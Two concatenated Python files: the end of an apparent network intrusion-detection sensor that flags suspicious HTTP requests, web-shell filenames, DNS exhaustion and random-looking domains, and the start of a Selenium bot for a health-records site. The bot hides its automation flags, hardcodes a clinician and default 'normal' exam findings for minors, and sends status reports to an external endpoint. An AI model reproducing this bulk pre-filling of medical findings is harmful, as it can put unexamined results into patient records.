trail = "%s(%s \\(%s %s\\))" % (host, path, method, post_data.strip())
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, trails[check][0], trails[check][1]))
else:
parts = url.split(check)
other = ("(%s)" % _ if _ else _ for _ in parts)
trail = check.join(other)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, trails[check][0], trails[check][1]))
return
if "%s/" % host in trails:
trail = "%s/" % host
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, trails[trail][0], trails[trail][1]))
return
if config.USE_HEURISTICS:
match = re.search(r"\bX-Forwarded-For:\s*([0-9.]+)".encode(), packet, re.I)
if match:
src_ip = "%s,%s" % (src_ip, match.group(1))
for char in SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS:
replacement = SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS[char]
path = path.replace(char, replacement)
if post_data:
post_data = post_data.replace(char, replacement)
if not any(_ in unquoted_path.lower() for _ in WHITELIST_HTTP_REQUEST_PATHS):
if any(_ in unquoted_path for _ in SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION):
found = _result_cache.get((CACHE_TYPE.PATH, unquoted_path))
if found is None:
for desc, regex in SUSPICIOUS_HTTP_REQUEST_REGEXES:
if re.search(regex, unquoted_path, re.I | re.DOTALL):
found = desc
break
_result_cache[(CACHE_TYPE.PATH, unquoted_path)] = found or ""
if found:
trail = "%s(%s)" % (host, path)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "%s (suspicious)" % found, "(heuristic)"), packet)
return
if any(_ in unquoted_post_data for _ in SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION):
found = _result_cache.get((CACHE_TYPE.POST_DATA, unquoted_post_data))
if found is None:
for desc, regex in SUSPICIOUS_HTTP_REQUEST_REGEXES:
if re.search(regex, unquoted_post_data, re.I | re.DOTALL):
found = desc
break
_result_cache[(CACHE_TYPE.POST_DATA, unquoted_post_data)] = found or ""
if found:
trail = "%s(%s \\(%s %s\\))" % (host, path, method, post_data.strip())
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "%s (suspicious)" % found, "(heuristic)"), packet)
return
if '.' in path:
_ = _urllib.parse.urlparse("http://%s" % url) # dummy scheme
path = path.lower()
filename = _.path.split('/')[-1]
name, extension = os.path.splitext(filename)
trail = "%s(%s)" % (host, path)
if extension and extension in SUSPICIOUS_DIRECT_DOWNLOAD_EXTENSIONS and not any(_ in path for _ in WHITELIST_DIRECT_DOWNLOAD_KEYWORDS) and '=' not in _.query and len(name) < 10:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "direct %s download (suspicious)" % extension, "(heuristic)"), packet)
elif filename in WEB_SHELLS:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "potential web shell (suspicious)", "(heuristic)"), packet)
else:
for desc, regex in SUSPICIOUS_HTTP_PATH_REGEXES:
if re.search(regex, filename, re.I):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "%s (suspicious)" % desc, "(heuristic)"), packet)
break
elif protocol == socket.IPPROTO_UDP: # UDP
_ = ip_data[iph_length:iph_length + 4]
if len(_) < 4:
return
src_port, dst_port = struct.unpack("!HH", _)
_ = _last_udp
_last_udp = (sec, src_ip, src_port, dst_ip, dst_port)
if _ == _last_udp: # skip bursts
return
if src_port != 53 and dst_port != 53: # not DNS
if dst_ip in trails:
trail = dst_ip
elif src_ip in trails:
trail = src_ip
else:
trail = None
if trail:
_ = _last_logged_udp
_last_logged_udp = _last_udp
if _ != _last_logged_udp:
if not any(_ in trails[trail][0] for _ in ("malware",)):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, trail, trails[trail][0], trails[trail][1]), packet)
else:
dns_data = ip_data[iph_length + 8:]
# Reference: http://www.ccs.neu.edu/home/amislove/teaching/cs4700/fall09/handouts/project1-primer.pdf
if len(dns_data) > 6:
qdcount = struct.unpack("!H", dns_data[4:6])[0]
if qdcount > 0:
offset = 12
query = ""
while len(dns_data) > offset:
length = ord(dns_data[offset:offset + 1])
if not length:
query = query[:-1]
break
query += get_text(dns_data[offset + 1:offset + length + 1]) + '.'
offset += length + 1
query = query.lower()
if not query or re.search(VALID_DNS_NAME_REGEX, query) is None or any(_ in query for _ in (".intranet.",)) or query.split('.')[-1] in IGNORE_DNS_QUERY_SUFFIXES:
return
parts = query.split('.')
if ord(dns_data[2:3]) & 0xfa == 0x00: # standard query (both recursive and non-recursive)
type_, class_ = struct.unpack("!HH", dns_data[offset + 1:offset + 5])
if len(parts) > 2:
if len(parts) > 3 and len(parts[-2]) <= 3:
domain = '.'.join(parts[-3:])
else:
domain = '.'.join(parts[-2:])
if not _check_domain_whitelisted(domain): # e.g. <hash>.hashserver.cs.trendmicro.com
if (sec - (_subdomains_sec or 0)) > DAILY_SECS:
_subdomains.clear()
_dns_exhausted_domains.clear()
_subdomains_sec = sec
subdomains = _subdomains.get(domain)
if not subdomains:
subdomains = _subdomains[domain] = set()
if not re.search(r"\A\d+\-\d+\-\d+\-\d+\Z", parts[0]):
if len(subdomains) < DNS_EXHAUSTION_THRESHOLD:
subdomains.add('.'.join(parts[:-2]))
else:
if (sec - (_last_dns_exhaustion or 0)) > 60:
trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
if re.search(r"bl\b", trail) is None: # generic check for DNSBLs
if not any(_ in subdomains for _ in LOCAL_SUBDOMAIN_LOOKUPS): # generic check for local DNS resolutions
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "potential dns exhaustion (suspicious)", "(heuristic)"), packet)
_dns_exhausted_domains.add(domain)
_last_dns_exhaustion = sec
return
# Reference: http://en.wikipedia.org/wiki/List_of_DNS_record_types
if type_ not in (12, 28) and class_ == 1: # Type not in (PTR, AAAA), Class IN
if addr_port(dst_ip, dst_port) in trails:
trail = addr_port(dst_ip, dst_port)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IPORT, "%s (%s)" % (dst_ip, query), trails[trail][0], trails[trail][1]), packet)
elif dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, "%s (%s)" % (dst_ip, query), trails[dst_ip][0], trails[dst_ip][1]), packet)
elif src_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet)
_check_domain(query, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, packet)
elif config.USE_HEURISTICS:
if ord(dns_data[2:3]) & 0x80: # standard response
if ord(dns_data[3:4]) == 0x80: # recursion available, no error
_ = offset + 5
try:
while _ < len(dns_data):
if ord(dns_data[_:_ + 1]) & 0xc0 != 0 and dns_data[_ + 2] == "\00" and dns_data[_ + 3] == "\x01": # Type A
break
else:
_ += 12 + struct.unpack("!H", dns_data[_ + 10: _ + 12])[0]
_ = dns_data[_ + 12:_ + 16]
if _:
answer = socket.inet_ntoa(_)
if answer in trails and not _check_domain_whitelisted(query):
_ = trails[answer]
if "sinkhole" in _[0]:
trail = "(%s).%s" % ('.'.join(parts[:-1]), '.'.join(parts[-1:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "sinkholed by %s (malware)" % _[0].split(" ")[1], "(heuristic)"), packet) # (e.g. kitro.pl, devomchart.com, jebena.ananikolic.su, vuvet.cn)
elif "parking" in _[0]:
trail = "(%s).%s" % ('.'.join(parts[:-1]), '.'.join(parts[-1:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "parked site (suspicious)", "(heuristic)"), packet)
except IndexError:
pass
elif ord(dns_data[3:4]) == 0x83: # recursion available, no such name
if '.'.join(parts[-2:]) not in _dns_exhausted_domains and not _check_domain_whitelisted(query) and not _check_domain_member(query, trails):
if parts[-1].isdigit():
return
if not (len(parts) > 4 and all(_.isdigit() and int(_) < 256 for _ in parts[:4])): # generic check for DNSBL IP lookups
if not is_local(dst_ip): # prevent FPs caused by local queries
for _ in filter(None, (query, "*.%s" % '.'.join(parts[-2:]) if query.count('.') > 1 else None)):
if _ not in NO_SUCH_NAME_COUNTERS or NO_SUCH_NAME_COUNTERS[_][0] != sec // 3600:
NO_SUCH_NAME_COUNTERS[_] = [sec // 3600, 1, set()]
else:
NO_SUCH_NAME_COUNTERS[_][1] += 1
NO_SUCH_NAME_COUNTERS[_][2].add(query)
if NO_SUCH_NAME_COUNTERS[_][1] > NO_SUCH_NAME_PER_HOUR_THRESHOLD:
if _.startswith("*."):
trail = "%s%s" % ("(%s)" % ','.join(item.replace(_[1:], "") for item in NO_SUCH_NAME_COUNTERS[_][2]), _[1:])
if not any(subdomain in trail for subdomain in LOCAL_SUBDOMAIN_LOOKUPS): # generic check for local DNS resolutions
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "excessive no such domain (suspicious)", "(heuristic)"), packet)
for item in NO_SUCH_NAME_COUNTERS[_][2]:
try:
del NO_SUCH_NAME_COUNTERS[item]
except KeyError:
pass
else:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, _, "excessive no such domain (suspicious)", "(heuristic)"), packet)
try:
del NO_SUCH_NAME_COUNTERS[_]
except KeyError:
pass
break
if len(parts) == 2 and parts[0] and '-' not in parts[0]:
part = parts[0]
trail = "(%s).%s" % (parts[0], parts[1])
result = _result_cache.get(part)
if result is None:
# Reference: https://github.com/exp0se/dga_detector
probabilities = (float(part.count(c)) / len(part) for c in set(_ for _ in part))
entropy = -sum(p * math.log(p) / math.log(2.0) for p in probabilities)
if entropy > SUSPICIOUS_DOMAIN_ENTROPY_THRESHOLD:
result = "entropy threshold no such domain (suspicious)"
if not result:
if sum(_ in CONSONANTS for _ in part) > SUSPICIOUS_DOMAIN_CONSONANT_THRESHOLD:
result = "consonant threshold no such domain (suspicious)"
_result_cache[part] = result or False
if result:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, result, "(heuristic)"), packet)
elif protocol in IPPROTO_LUT: # non-TCP/UDP (e.g. ICMP)
if protocol == socket.IPPROTO_ICMP:
if ord(ip_data[iph_length:iph_length + 1]) != 0x08: # Non-echo request
return
elif protocol == socket.IPPROTO_ICMPV6:
if ord(ip_data[iph_length:iph_length + 1]) != 0x80: # Non-echo request
return
if dst_ip in trails:
log_event((sec, usec, src_ip, '-', dst_ip, '-', IPPROTO_LUT[protocol], TRAIL.IP, dst_ip, trails[dst_ip][0], trails[dst_ip][1]), packet)
elif src_ip in trails:
log_event((sec, usec, src_ip, '-', dst_ip, '-', IPPROTO_LUT[protocol], TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet)
except struct.error:
pass
except Exception:
if config.SHOW_DEBUG:
traceback.print_exc()
def init():
"""
Performs sensor initialization
"""
global _multiprocessing
try:
import multiprocessing
if config.PROCESS_COUNT > 1 and not config.profile:
_multiprocessing = multiprocessing
except (ImportError, OSError, NotImplementedError):
pass
def update_timer():
retries = 0
if not config.no_updates:
while retries < CHECK_CONNECTION_MAX_RETRIES and not check_connection():
sys.stdout.write("[!] can't update because of lack of Internet connection (waiting..." if not retries else '.')
sys.stdout.flush()
time.sleep(10)
retries += 1
if retries:
print(")")
if config.no_updates or retries == CHECK_CONNECTION_MAX_RETRIES:
if retries == CHECK_CONNECTION_MAX_RETRIES:
print("[x] going to continue without online update")
_ = update_trails(offline=True)
else:
_ = update_trails()
update_ipcat()
if _:
trails.clear()
trails.update(_)
elif not trails:
_ = load_trails()
trails.update(_)
_regex = ""
for trail in trails:
if "static" in trails[trail][1]:
if re.search(r"[\].][*+]|\[[a-z0-9_.\-]+\]", trail, re.I):
try:
re.compile(trail)
except:
pass
else:
if re.escape(trail) != trail:
index = _regex.count("(?P<g")
if index < 100: # Reference: https://stackoverflow.com/questions/478458/python-regular-expressions-with-more-than-100-groups
_regex += "|(?P<g%s>%s)" % (index, trail)
trails._regex = _regex.strip('|')
thread = threading.Timer(config.UPDATE_PERIOD, update_timer)
thread.daemon = True
thread.start()
create_log_directory()
get_error_log_handle()
check_memory()
msg = "[i] using '%s' for trail storage" % config.TRAILS_FILE
if os.path.isfile(config.TRAILS_FILE):
mtime = time.gmtime(os.path.getmtime(config.TRAILS_FILE))
msg += " (last modification: '%s')" % time.strftime(HTTP_TIME_FORMAT, mtime)
print(msg)
update_timer()
if not config.DISABLE_CHECK_SUDO and check_sudo() is False:
exit("[!] please run '%s' with sudo/Administrator privileges" % __file__)
if config.plugins:
config.plugin_functions = []
for plugin in re.split(r"[,;]", config.plugins):
plugin = plugin.strip()
found = False
for _ in (plugin, os.path.join("plugins", plugin), os.path.join("plugins", "%s.py" % plugin)):
if os.path.isfile(_):
plugin = _
found = True
break
if not found:
exit("[!] plugin script '%s' not found" % plugin)
else:
dirname, filename = os.path.split(plugin)
dirname = os.path.abspath(dirname)
if not os.path.exists(os.path.join(dirname, '__init__.py')):
exit("[!] empty file '__init__.py' required inside directory '%s'" % dirname)
if not filename.endswith(".py"):
exit("[!] plugin script '%s' should have an extension '.py'" % filename)
if dirname not in sys.path:
sys.path.insert(0, dirname)
try:
module = __import__(filename[:-3].encode(sys.getfilesystemencoding()))
except (ImportError, SyntaxError) as msg:
exit("[!] unable to import plugin script '%s' (%s)" % (filename, msg))
found = False
for name, function in inspect.getmembers(module, inspect.isfunction):
if name == "plugin" and not set(inspect.getargspec(function).args) & set(("event_tuple', 'packet")):
found = True
config.plugin_functions.append(function)
function.__name__ = module.__name__
if not found:
exit("[!] missing function 'plugin(event_tuple, packet)' in plugin script '%s'" % filename)
if config.pcap_file:
for _ in config.pcap_file.split(','):
_caps.append(pcapy.open_offline(_))
else:
interfaces = set(_.strip() for _ in config.MONITOR_INTERFACE.split(','))
if (config.MONITOR_INTERFACE or "").lower() == "any":
if IS_WIN or "any" not in pcapy.findalldevs():
print("[x] virtual interface 'any' missing. Replacing it with all interface names")
interfaces = pcapy.findalldevs()
else:
print("[?] in case of any problems with packet capture on virtual interface 'any', please put all monitoring interfaces to promiscuous mode manually (e.g. 'sudo ifconfig eth0 promisc')")
for interface in interfaces:
if interface.lower() != "any" and re.sub(r"(?i)\Anetmap:", "", interface) not in pcapy.findalldevs():
hint = "[?] available interfaces: '%s'" % ",".join(pcapy.findalldevs())
exit("[!] interface '%s' not found\n%s" % (interface, hint))
print("[i] opening interface '%s'" % interface)
try:
_caps.append(pcapy.open_live(interface, SNAP_LEN, True, CAPTURE_TIMEOUT))
except (socket.error, pcapy.PcapError):
if "permitted" in str(sys.exc_info()[1]):
exit("[!] permission problem occurred ('%s')" % sys.exc_info()[1])
elif "No such device" in str(sys.exc_info()[1]):
exit("[!] no such device '%s'" % interface)
else:
raise
if config.LOG_SERVER and ':' not in config.LOG_SERVER:
exit("[!] invalid configuration value for 'LOG_SERVER' ('%s')" % config.LOG_SERVER)
if config.SYSLOG_SERVER and not len(config.SYSLOG_SERVER.split(':')) == 2:
exit("[!] invalid configuration value for 'SYSLOG_SERVER' ('%s')" % config.SYSLOG_SERVER)
if config.CAPTURE_FILTER:
print("[i] setting capture filter '%s'" % config.CAPTURE_FILTER)
for _cap in _caps:
try:
_cap.setfilter(config.CAPTURE_FILTER)
except:
pass
if _multiprocessing:
_init_multiprocessing()
if not IS_WIN and not config.DISABLE_CPU_AFFINITY:
try:
try:
mod = int(subprocess.check_output("grep -c ^processor /proc/cpuinfo", stderr=subprocess.STDOUT, shell=True).strip())
used = subprocess.check_output("for pid in $(ps aux | grep python | grep sensor.py | grep -E -o 'root[ ]*[0-9]*' | tr -d '[:alpha:] '); do schedtool $pid; done | grep -E -o 'AFFINITY .*' | cut -d ' ' -f 2 | grep -v 0xf", stderr=subprocess.STDOUT, shell=True).strip().split('\n')
max_used = max(int(_, 16) for _ in used)
affinity = max(1, (max_used << 1) % 2 ** mod)
except:
affinity = 1
p = subprocess.Popen("schedtool -n -2 -M 2 -p 10 -a 0x%02x %d" % (affinity, os.getpid()), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
_, stderr = p.communicate()
if "not found" in stderr:
msg, _ = "[?] please install 'schedtool' for better CPU scheduling", platform.linux_distribution()[0].lower()
for distro, install in {("fedora", "centos"): "sudo yum install schedtool", ("debian", "ubuntu"): "sudo apt-get install schedtool"}.items():
if _ in distro:
msg += " (e.g. '%s')" % install
break
print(msg)
except:
pass
def _init_multiprocessing():
"""
Inits worker processes used in multiprocessing mode
"""
global _buffer
global _n
if _multiprocessing:
print("[i] preparing capture buffer...")
try:
_buffer = mmap.mmap(-1, config.CAPTURE_BUFFER) # http://www.alexonlinux.com/direct-io-in-python
_ = b"\x00" * MMAP_ZFILL_CHUNK_LENGTH
for i in xrange(config.CAPTURE_BUFFER // MMAP_ZFILL_CHUNK_LENGTH):
_buffer.write(_)
_buffer.seek(0)
except KeyboardInterrupt:
raise
except:
exit("[!] unable to allocate network capture buffer. Please adjust value of 'CAPTURE_BUFFER'")
print("[i] creating %d more processes (out of total %d)" % (config.PROCESS_COUNT - 1, config.PROCESS_COUNT))
_n = _multiprocessing.Value('L', lock=False)
for i in xrange(config.PROCESS_COUNT - 1):
process = _multiprocessing.Process(target=worker, name=str(i), args=(_buffer, _n, i, config.PROCESS_COUNT - 1, _process_packet))
process.daemon = True
process.start()
def monitor():
"""
Sniffs/monitors given capturing interface
"""
print("[o] running...")
def packet_handler(datalink, header, packet):
global _count
ip_offset = None
try:
dlt_offset = DLT_OFFSETS[datalink]
except KeyError:
log_error("Received unexpected datalink (%d)" % datalink, single=True)
return
try:
if datalink == pcapy.DLT_RAW:
ip_offset = dlt_offset
elif datalink == pcapy.DLT_PPP:
if packet[2:4] in (b"\x00\x21", b"\x00\x57"): # (IPv4, IPv6)
ip_offset = dlt_offset
elif datalink == pcapy.DLT_NULL:
if packet[0:4] in (b"\x02\x00\x00\x00", b"\x23\x00\x00\x00"): # (IPv4, IPv6)
ip_offset = dlt_offset
elif dlt_offset >= 2:
if packet[dlt_offset - 2:dlt_offset] == b"\x81\x00": # VLAN
dlt_offset += 4
if packet[dlt_offset - 2:dlt_offset] in (b"\x08\x00", b"\x86\xdd"): # (IPv4, IPv6)
ip_offset = dlt_offset
except IndexError:
pass
if ip_offset is None:
return
try:
if six.PY3: # https://github.com/helpsystems/pcapy/issues/37#issuecomment-530795813
sec, usec = [int(_) for _ in ("%.6f" % time.time()).split('.')]
else:
sec, usec = header.getts()
if _multiprocessing:
block = struct.pack("=III", sec, usec, ip_offset) + packet
if _locks.count:
_locks.count.acquire()
write_block(_buffer, _count, block)
_n.value = _count = _count + 1
if _locks.count:
_locks.count.release()
else:
_process_packet(packet, sec, usec, ip_offset)
except socket.timeout:
pass
try:
def _(_cap):
global _done_count
datalink = _cap.datalink()
if six.PY3: # https://github.com/helpsystems/pcapy/issues/37#issuecomment-530795813
def _loop_handler(header, packet):
packet_handler(datalink, header, packet)
_cap.loop(-1, _loop_handler)
else:
while True:
success = False
try:
(header, packet) = _cap.next()
if header is not None:
success = True
packet_handler(datalink, header, packet)
elif config.pcap_file:
with _done_lock:
_done_count += 1
break
except (pcapy.PcapError, socket.timeout):
pass
if not success:
time.sleep(REGULAR_SENSOR_SLEEP_TIME)
if config.profile and len(_caps) == 1:
print("[=] will store profiling results to '%s'..." % config.profile)
_(_caps[0])
else:
if len(_caps) > 1:
if _multiprocessing:
_locks.count = threading.Lock()
_locks.connect_sec = threading.Lock()
for _cap in _caps:
threading.Thread(target=_, args=(_cap,)).start()
while _caps and not _done_count == (config.pcap_file or "").count(',') + 1:
time.sleep(1)
print("[i] all capturing interfaces closed")
except SystemError as ex:
if "error return without" in str(ex):
print("\r[x] stopping (Ctrl-C pressed)")
else:
raise
except KeyboardInterrupt:
print("\r[x] stopping (Ctrl-C pressed)")
finally:
print("\r[i] please wait...")
if _multiprocessing:
try:
for _ in xrange(config.PROCESS_COUNT - 1):
write_block(_buffer, _n.value, b"", BLOCK_MARKER.END)
_n.value = _n.value + 1
while _multiprocessing.active_children():
time.sleep(REGULAR_SENSOR_SLEEP_TIME)
except KeyboardInterrupt:
pass
if config.pcap_file:
flush_condensed_events(True)
def main():
for i in xrange(1, len(sys.argv)):
if sys.argv[i] == "-q":
sys.stdout = open(os.devnull, 'w')
if sys.argv[i] == "-i":
for j in xrange(i + 2, len(sys.argv)):
value = sys.argv[j]
if os.path.isfile(value):
sys.argv[i + 1] += ",%s" % value
sys.argv[j] = ''
else:
break
print("%s (sensor) #v%s\n" % (NAME, VERSION))
parser = optparse.OptionParser(version=VERSION)
parser.add_option("-c", dest="config_file", default=CONFIG_FILE, help="configuration file (default: '%s')" % os.path.split(CONFIG_FILE)[-1])
parser.add_option("-i", dest="pcap_file", help="open pcap file for offline analysis")
parser.add_option("-p", dest="plugins", help="plugin(s) to be used per event")
parser.add_option("-q", dest="quiet", action="store_true", help="turn off regular output")
parser.add_option("--console", dest="console", action="store_true", help="print events to console (Note: switch '-q' might be useful)")
parser.add_option("--no-updates", dest="no_updates", action="store_true", help="disable (online) trail updates")
parser.add_option("--debug", dest="debug", action="store_true", help=optparse.SUPPRESS_HELP)
parser.add_option("--profile", dest="profile", help=optparse.SUPPRESS_HELP)
options, _ = parser.parse_args()
read_config(options.config_file)
for option in dir(options):
if isinstance(getattr(options, option), (six.string_types, bool)) and not option.startswith('_'):
config[option] = getattr(options, option)
if options.debug:
config.console = True
config.PROCESS_COUNT = 1
config.SHOW_DEBUG = True
if options.pcap_file:
if options.pcap_file == '-':
print("[i] using STDIN")
else:
for _ in options.pcap_file.split(','):
if not os.path.isfile(_):
exit("[!] missing pcap file '%s'" % _)
print("[i] using pcap file(s) '%s'" % options.pcap_file)
if not config.DISABLE_CHECK_SUDO and not check_sudo():
exit("[!] please run '%s' with sudo/Administrator privileges" % __file__)
try:
init()
if config.profile:
open(config.profile, "w+b").write("")
cProfile.run("monitor()", config.profile)
else:
monitor()
except KeyboardInterrupt:
print("\r[x] stopping (Ctrl-C pressed)")
if __name__ == "__main__":
show_final = True
try:
main()
except SystemExit as ex:
show_final = False
if isinstance(get_ex_message(ex), six.string_types):
print(get_ex_message(ex))
os._exit(1)
except IOError:
show_final = False
log_error("\n\n[!] session abruptly terminated\n[?] (hint: \"https://stackoverflow.com/a/20997655\")")
except Exception:
msg = "\r[!] unhandled exception occurred ('%s')" % sys.exc_info()[1]
msg += "\n[x] please report the following details at 'https://github.com/stamparm/maltrail/issues':\n---\n'%s'\n---" % traceback.format_exc()
log_error("\n\n%s" % msg.replace("\r", ""))
print(msg)
finally:
if show_final:
print("[i] finished")
os._exit(0)
|
pcc.py
|
import time
import tkinter
from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.options import Options
import os
import csv
from datetime import datetime
import time as t
import pandas as pd
from selenium.webdriver.support.ui import Select
import tkinter as tk
import tkinter.ttk as ttk
import tkinter.messagebox
from tkinter import filedialog as fd
from threading import Thread
import traceback
import re
import requests
import socket
import json
# Global Variables
driver = None
patient_data_sheet = None
thread_stopped = False
get_e_timeout = 20
current_users = None
user_name = None
password = None
selected_sheet = ""
name_designation="Juan Garcia MD"
md_do_pa_np="PA"
clinic_or_practice="Trinity Health Services"
vis_date="12/3/2021"
temp_c=""
hr=""
bp=""
rr=""
ht=""
wt=""
no_allergies="Yes"
food="No"
medication="No"
corrected_left_eye=""
corrected_both_eyes=""
uncorrected_right_eye="20/20"
uncorrected_left_eye="20/20"
uncorrected_both_eyes="20/20"
medical_history=""
travel_history="0"
past_medical_history="Denies"
family_history="Denies"
lmp="N/A"
previous_regnancy="N/A"
no_abnormal_findings="Yes"
other_1=""
other_2=""
general_appearance="normal"
heent="normal"
neck="normal"
heart="normal"
lungs="normal"
abdomen="normal"
gu_gyn=""
describe="Deffered"
extremeties="normal"
back_spine="normal"
neurologic="normal"
skin="normal"
describe_concerns=""
mental_health="0"
h15="n"
other_medical="Contact with and (suspected) exposure to COVID-19."
# Strings
specify_travel = "The minor is medically cleared to travel only if all covid quarantine clearance criteria have been met and no other concerns requiring medical follow up and/or specialty follow-up have been identified in subsequent visits."
def update_status(msg):
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
print(current_time + " - " + msg)
def open_chrome():
global driver
# tkinter.messagebox.showinfo("Information", "Please log into your account using next opening driver. Then click on 'Start' button to start the automation.")
update_status("Opening Chrome..")
options = Options()
options.add_argument("start-maximized")
options.add_experimental_option("excludeSwitches", ["enable-automation"])
options.add_experimental_option('useAutomationExtension', False)
# options.add_argument("user-data-dir=" + os.getcwd() + "/ChromeProfile")
# driver = webdriver.Chrome(ChromeDriverManager().install(), options=options)
# Download from https://chromedriver.chromium.org/downloads
driver = webdriver.Chrome("chromedriver.exe", options=options)
update_status("Navigating to CRM..")
driver.get("https://login.pointclickcare.com/home/userLogin.xhtml")
def wait_button(d, el, t):
try:
el = WebDriverWait(d, get_e_timeout).until(EC.element_to_be_clickable((t, el)))
return False
except Exception as e:
print(e)
return True
pass
def wait_window(d):
try:
WebDriverWait(d, get_e_timeout).until(EC.new_window_is_opened)
return False
except Exception as e:
print(e)
return True
pass
def send_text(d, el, data):
try:
d.find_element(By.ID, el).clear()
d.find_element(By.ID, el).send_keys(data)
return False
except Exception as e:
print(e)
return True
pass
def send_text_name(d, el, data):
try:
d.find_element(By.NAME, el).clear()
d.find_element(By.NAME, el).send_keys(data)
return False
except Exception as e:
print(e)
return True
pass
def send_click_pos(d, el, pos):
try:
d.find_elements(By.ID, el)[pos].click()
return False
except Exception as e:
print(e)
return True
pass
def send_click_pos_by_class(d, el, pos):
try:
d.find_elements(By.CLASS_NAME, el)[pos].click()
return False
except Exception as e:
print(e)
return True
pass
def send_click(d, el):
try:
d.find_element(By.ID, el).click()
return False
except Exception as e:
print(e)
return True
pass
def send_click_name(d, el):
try:
d.find_elements(By.NAME, el).click()
return False
except Exception as e:
print(e)
return True
pass
def send_enter(d, el):
try:
d.find_element(By.ID, el).send_keys(Keys.ENTER)
return False
except Exception as e:
print(e)
return True
pass
def click_link(d, el):
try:
d.find_element(By.XPATH, '//a[contains(text(),"' + el + '")]').click()
return False
except Exception as e:
print(e)
return True
pass
def click_link_href(d, el):
try:
d.find_element(By.XPATH, '//a[@href="' + el + '"]').click()
return False
except Exception as e:
print(e)
return True
pass
def click_button_value(d, el):
try:
d.find_element(By.XPATH, '//input[@value="' + el + '"]').click()
return False
except Exception as e:
print(e)
return True
pass
def get_string_date(el):
res = ""
try:
res = el.strftime("%m/%d/%Y")
except:
res = el
pass
return res
def select_window(d, pos):
try:
d.switch_to_window(d.window_handles[pos])
return False
except Exception as e:
print(e)
return True
pass
def select_menu_name(d, name, value):
try:
s = Select(d.find_element(By.NAME, name))
s.select_by_value(value)
return False
except Exception as e:
print(e)
return True
pass
def overwrite_file():
try:
with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), "users_not_found.txt"), "w") as myfile:
myfile.write("userId,A,name\n")
return False
except Exception as e:
print(e)
return True
pass
def write_file_data(data):
try:
with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), "users_not_found.txt"), "a") as myfile:
myfile.write(data)
return False
except Exception as e:
print(e)
return True
pass
def get_vaccine_by_name(vac_name, imm_list):
for i in range(len(imm_list)):
if imm_list[i]['Option'].lower() == vac_name.lower():
return imm_list[i]
def clean_text(txt):
try:
txt = txt.replace(".0", "")
new_string = ''.join(char for char in txt if char.isalnum())
return new_string
except:
pass
def getData(obj , name):
try:
return obj[name]
except Exception as e:
print(e)
return ""
def selectSheet(sheet):
global selected_sheet
selected_sheet = sheet
print(selected_sheet)
def sendRequest(subject, message, error = True):
try:
payload = {
"computer": socket.gethostname(),
"subject": subject,
"message": message,
"error": error,
"bot": "pcc"
}
print(payload)
r = requests.post("https://2qpxr842pk.execute-api.us-east-1.amazonaws.com/Prod/post-sns-data", data=json.dumps(payload))
return payload
except Exception as e:
print(e)
return ""
def main_loop():
# read excel
global driver,patient_data_sheet, current_users, user_name, password, selected_sheet
print("SELECTED SHEET " + selected_sheet)
# Read Immunizations.xlsx Excel file
df = pd.read_excel(os.path.join(os.path.dirname(os.path.abspath(__file__)), "data.xlsx"), sheet_name=selected_sheet)
imm_list = []
for index, row in df.iterrows():
imm_list.append(row)
file_immunizations = pd.read_excel(os.path.join(os.path.dirname(os.path.abspath(__file__)), "Immunizations.xlsx"), sheet_name='Sheet1')
immunizations_list = []
for index, row in file_immunizations.iterrows():
immunizations_list.append(row)
# Loop through patient list
for data in imm_list:
try:
driver.refresh()
t.sleep(2)
now = datetime.now()
dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
print("date and time =", dt_string, '>>>>logging in ')
target_user_a = clean_text(str(getData(data,'A#')))
target_user_id = clean_text(str(getData(data,'userId')))
targent_name = getData(data,'First Name') + ' ' + getData(data,'Last Name')
print("Processing - " + target_user_id + "-" + target_user_a + "-" + targent_name)
select_window(driver, 0)
t.sleep(1)
select_window(driver, 0)
res = select_window(driver, 0)
if res:
